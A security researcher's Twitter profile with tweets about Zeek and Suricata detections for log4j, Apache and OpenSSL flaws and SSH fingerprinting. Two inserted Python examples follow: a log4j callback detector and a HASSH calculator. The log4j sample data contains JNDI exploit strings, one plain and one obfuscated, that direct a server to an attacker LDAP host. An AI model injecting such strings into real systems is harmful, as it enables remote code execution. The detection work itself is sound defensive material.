Ben Reardon (@benreardon)'s Twitter Profile
Ben Reardon

@benreardon

@[email protected], Security Researcher, works at Corelight. Views are my own, etc.

ID: 24290590

Link: https://datavizcomau.wordpress.com | Joined: 14-03-2009 00:22:07

462 Tweets

691 Followers

275 Following

Joakim Kennedy (@joakimkennedy):

Chinese #APTs are currently very active. Here is a technical analysis of a #Linux backdoor with a kernel-level #rootkit used by one of them... intezer.com/blog/malware-a… 👏 Avigayil Mechtinger

Ben Reardon (@benreardon):

Detecting Linux-based C2 ‘RedXOR’ on the wire. I wanted this to be like a tutorial/example of how you can use Zeek’s state-keeping functionality. corelight.blog/2021/04/20/det… #RedXor #DFIR #Zeek #C2 #RHEL

Ben Reardon (@benreardon):

Yet more content from the Corelight Labs team. A Zeek package and Suricata rule for detection of CVE-2021-31166, a wormable Windows HTTP Protocol Stack vulnerability. This detects the currently publicly available PoC exploit. Enjoy! github.com/corelight/CVE-… Anthony Kasza

Ben Reardon (@benreardon):

A follow-up from the Corelight Labs team on the HTTP vuln #CVE-2021-31166. Some insight into our Zeek and Suricata detections, plus the evolution of the threat, with WinRM being a vector on TCP port 5985. corelight.blog/2021/05/27/det… Aaron Soto Anthony Kasza Alex Kirk Paul Dokas

Ben Reardon (@benreardon):

A Zeek package for detection of the recent Apache path traversal bug in 2.4.49 and 2.4.50, CVE-2021-41773: github.com/corelight/CVE-… . The notice includes a snippet of the POST content for handier-than-pcap triage, e.g. when the target is something like /bin/sh

Ben Reardon (@benreardon):

TIL the patent on #SSH fingerprinting “HASSH” that I submitted while at Salesforce was granted after a few years in the USPO queue. Guess I'm now a legit inventor! Hat tip to my co-inventors/pals Adel Ka, John Althouse and Jeff Atkinson. #shouldersofgiants #DFIR #NDR #Zeek patents.google.com/patent/US11095…

Corelight (@corelight_inc):

You may not think CVE-2021-42292 can be detected at the network level, but our @Corelight_inc Labs team (big shout-out to Keith J. Jones, Ph.D. Alex Kirk @ynadji Ben Reardon) shows you how on the blog today: corelight.com/blog/detecting… #CyberSecurity #DFIR #ThreatHunting #OpenNDR

Ben Reardon (@benreardon):

Some #log4j detection content from the Corelight Labs team. Creates notices, PLUS a bonus log4j.log containing the payload IP:port:uri, which is used to watch for subsequent traffic to it (read: pwned). corelight.com/blog/simplifyi… and the code: github.com/corelight/cve-…

Ben Reardon (@benreardon):

Detecting second-stage/callback #log4j payloads. AKA when Java GETs Java, you’re going to want to know about it… The third installment of open-sourced log4j content from the Corelight Labs Team. corelight.com/blog/detecting… #Log4Shell #DFIR #zeek
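The two log4j tweets above describe a two-pass approach: record the callback host:port:uri carried in each JNDI payload, then alert when the victim later connects to that callback, and separately flag a JVM fetching a class file ("Java GETs Java"). The following is an added example in Python that is not the Corelight Labs package and not code from the tweets; the log records, the unfolding of `${lower:x}`/`${::-x}` obfuscation and the default ports are my own assumptions for illustration, and it goes slightly beyond the tweets by handling those obfuscated forms.

```python
import re

# Constructed sample HTTP requests (not real traffic). The JNDI lookup string is
# the trigger; the host:port inside it is the attacker's LDAP/RMI callback that
# a vulnerable JVM connects to next.
SAMPLE_REQUESTS = [
    {"src": "198.51.100.7", "dst": "10.0.0.5", "uri": "/login",
     "user_agent": "${jndi:ldap://203.0.113.5:1389/Exploit}"},
    {"src": "198.51.100.8", "dst": "10.0.0.5", "uri": "/",
     "x_api_version": "${${lower:j}ndi:${::-l}dap://203.0.113.9/a}"},
]

# Constructed sample connection log: the victim later connecting outbound.
SAMPLE_CONNS = [
    {"src": "10.0.0.5", "dst": "203.0.113.5", "dport": 1389},
    {"src": "10.0.0.5", "dst": "203.0.113.9", "dport": 389},
    {"src": "10.0.0.5", "dst": "8.8.8.8", "dport": 53},
]

# Assumed default ports when the payload omits one.
DEFAULT_PORTS = {"ldap": 389, "ldaps": 636, "rmi": 1099, "dns": 53, "iiop": 1050}

# ${lower:x}, ${upper:x} and ${anything:-x} all evaluate to x. Case is irrelevant
# here because the final match is case-insensitive and hosts are lowercased.
_CASE_RE = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.I)
_DEFAULT_RE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
_JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+):/*(?P<host>[^:/\s}]+)(?::(?P<port>\d+))?(?P<path>/[^}\s]*)?\}",
    re.I,
)


def unfold(value: str) -> str:
    """Collapse nested lookups innermost-first until nothing changes, so an
    obfuscated ${${lower:j}ndi:...} becomes a plain ${jndi:...}."""
    prev = None
    while prev != value:
        prev = value
        value = _CASE_RE.sub(lambda m: m.group(1), value)
        value = _DEFAULT_RE.sub(lambda m: m.group(1), value)
    return value


def extract_callbacks(value: str) -> list:
    """Return (host, port, path) for every JNDI lookup in one header value."""
    out = []
    for m in _JNDI_RE.finditer(unfold(value)):
        scheme = m.group("scheme").lower()
        port = int(m.group("port")) if m.group("port") else DEFAULT_PORTS.get(scheme, 0)
        out.append((m.group("host").lower(), port, m.group("path") or "/"))
    return out


def build_watchlist(requests: list) -> dict:
    """First pass: scan every header of every request and map
    (callback host, port) -> details. This plays the role of the log4j.log
    record of payload IP:port:uri per exploit attempt."""
    watch = {}
    for req in requests:
        for field, value in req.items():
            if field in ("src", "dst"):
                continue
            for host, port, path in extract_callbacks(str(value)):
                watch.setdefault((host, port),
                                 {"uri": path, "victim": req["dst"], "attacker": req["src"]})
    return watch


def flag_callbacks(watch: dict, conns: list) -> list:
    """Second pass: a connection to a recorded callback means the lookup
    actually fired, i.e. the victim is reaching out to the attacker."""
    hits = []
    for c in conns:
        key = (c["dst"], c["dport"])
        if key in watch:
            hits.append({"victim": c["src"],
                         "callback": f"{key[0]}:{key[1]}{watch[key]['uri']}"})
    return hits


JAVA_CLASS_MAGIC = b"\xca\xfe\xba\xbe"


def is_second_stage(http: dict) -> bool:
    """'Java GETs Java': a JVM user agent fetching a class file, by name or by
    response content, is the second stage of Log4Shell."""
    ua = http.get("user_agent", "")
    uri = http.get("uri", "")
    body = http.get("resp_body", b"")
    return ua.startswith("Java/") and (uri.lower().endswith(".class") or body[:4] == JAVA_CLASS_MAGIC)


if __name__ == "__main__":
    watch = build_watchlist(SAMPLE_REQUESTS)
    for hit in flag_callbacks(watch, SAMPLE_CONNS):
        print("callback fired:", hit)
```

The watchlist is keyed on host and port only: the URI is kept for the analyst, but the connection log has no URI to match against, and an attacker can serve the payload from any path once the JVM connects.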

Ben Reardon (@benreardon):

Detection of vulnerable servers and exploit attempts against #OpenSSL punycode vulnerability #CVE-2022-3602. github.com/corelight/CVE-… Corelight

Ben Reardon (@benreardon):

One of my favourite moments at hacker summer camp was catching up with my old mate Adel Ka and exchanging country gifts. Make sure you check out his talk at Defcon!

Ben Reardon (@benreardon):

Detect the brand new "SSHAMBLE" scanner (just dropped by HD at Black Hat USA) with this fingerprint: hassh=c6c8b23b1c966dad1173df11c4e4f431 . More on this later! Corelight customers already have the hassh package available; we also open-source it here: github.com/corelight/hassh.
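The HASSH tweets above (the patent and the SSHAMBLE fingerprint) rely on one fixed construction: the client fingerprint is the MD5 of the KEXINIT name-lists `kex_algorithms;encryption_algorithms_client_to_server;mac_algorithms_client_to_server;compression_algorithms_client_to_server`, and hasshServer uses the server-to-client lists. The following is an added example in Python, not the Corelight hassh package and not code from the tweets; it encodes and parses a KEXINIT payload (RFC 4253 section 7.1 layout), computes both fingerprints, and matches against a watchlist. The algorithm lists are constructed for illustration and do not belong to any real client; the only real value is the SSHAMBLE fingerprint from the tweet.

```python
import hashlib
import os
import struct

SSH_MSG_KEXINIT = 20

# The ten name-lists of SSH_MSG_KEXINIT, in wire order (RFC 4253 section 7.1).
NAME_LISTS = [
    "kex_algorithms", "server_host_key_algorithms",
    "encryption_algorithms_client_to_server", "encryption_algorithms_server_to_client",
    "mac_algorithms_client_to_server", "mac_algorithms_server_to_client",
    "compression_algorithms_client_to_server", "compression_algorithms_server_to_client",
    "languages_client_to_server", "languages_server_to_client",
]

# Constructed sample algorithm lists (illustrative, not a real client).
SAMPLE_CLIENT = {
    "kex_algorithms": "curve25519-sha256,ecdh-sha2-nistp256,diffie-hellman-group14-sha256",
    "server_host_key_algorithms": "ssh-ed25519,rsa-sha2-512",
    "encryption_algorithms_client_to_server": "aes128-ctr,aes256-gcm@openssh.com",
    "encryption_algorithms_server_to_client": "aes128-ctr,aes256-gcm@openssh.com",
    "mac_algorithms_client_to_server": "hmac-sha2-256,hmac-sha1",
    "mac_algorithms_server_to_client": "hmac-sha2-256",
    "compression_algorithms_client_to_server": "none",
    "compression_algorithms_server_to_client": "none",
    "languages_client_to_server": "",
    "languages_server_to_client": "",
}

# Watchlist: fingerprint -> label. The SSHAMBLE value is the one in the tweet.
WATCHLIST = {"c6c8b23b1c966dad1173df11c4e4f431": "SSHAMBLE scanner"}


def _name_list(s: str) -> bytes:
    data = s.encode("ascii")
    return struct.pack(">I", len(data)) + data


def build_kexinit(lists: dict, cookie: bytes = None) -> bytes:
    """Encode a KEXINIT payload (the part inside the binary packet framing)."""
    cookie = cookie if cookie is not None else os.urandom(16)
    body = bytes([SSH_MSG_KEXINIT]) + cookie
    for name in NAME_LISTS:
        body += _name_list(lists[name])
    body += b"\x00"               # first_kex_packet_follows = FALSE
    body += struct.pack(">I", 0)  # reserved for future extension
    return body


def parse_kexinit(payload: bytes) -> dict:
    """Decode a KEXINIT payload back into its name-lists."""
    if payload[0] != SSH_MSG_KEXINIT:
        raise ValueError("not a KEXINIT message")
    off = 17  # 1-byte message id + 16-byte random cookie
    out = {}
    for name in NAME_LISTS:
        (length,) = struct.unpack_from(">I", payload, off)
        off += 4
        out[name] = payload[off:off + length].decode("ascii")
        off += length
    return out


def hassh(lists: dict) -> str:
    """Client fingerprint: kex;enc_c2s;mac_c2s;comp_c2s, MD5-hashed."""
    return hashlib.md5(";".join([
        lists["kex_algorithms"],
        lists["encryption_algorithms_client_to_server"],
        lists["mac_algorithms_client_to_server"],
        lists["compression_algorithms_client_to_server"],
    ]).encode("ascii")).hexdigest()


def hassh_server(lists: dict) -> str:
    """Server fingerprint: same shape, built from the server-to-client lists."""
    return hashlib.md5(";".join([
        lists["kex_algorithms"],
        lists["encryption_algorithms_server_to_client"],
        lists["mac_algorithms_server_to_client"],
        lists["compression_algorithms_server_to_client"],
    ]).encode("ascii")).hexdigest()


def classify(payload: bytes, watchlist: dict = WATCHLIST):
    """Return the watchlist label for a client KEXINIT, or None if unknown."""
    return watchlist.get(hassh(parse_kexinit(payload)))


if __name__ == "__main__":
    pkt = build_kexinit(SAMPLE_CLIENT)
    print("hassh:", hassh(parse_kexinit(pkt)), "label:", classify(pkt))
```

Because the 16-byte cookie and the host-key, language and reserved fields are excluded, the fingerprint is stable across connections from the same implementation while still changing whenever the offered cipher, MAC or KEX preferences change.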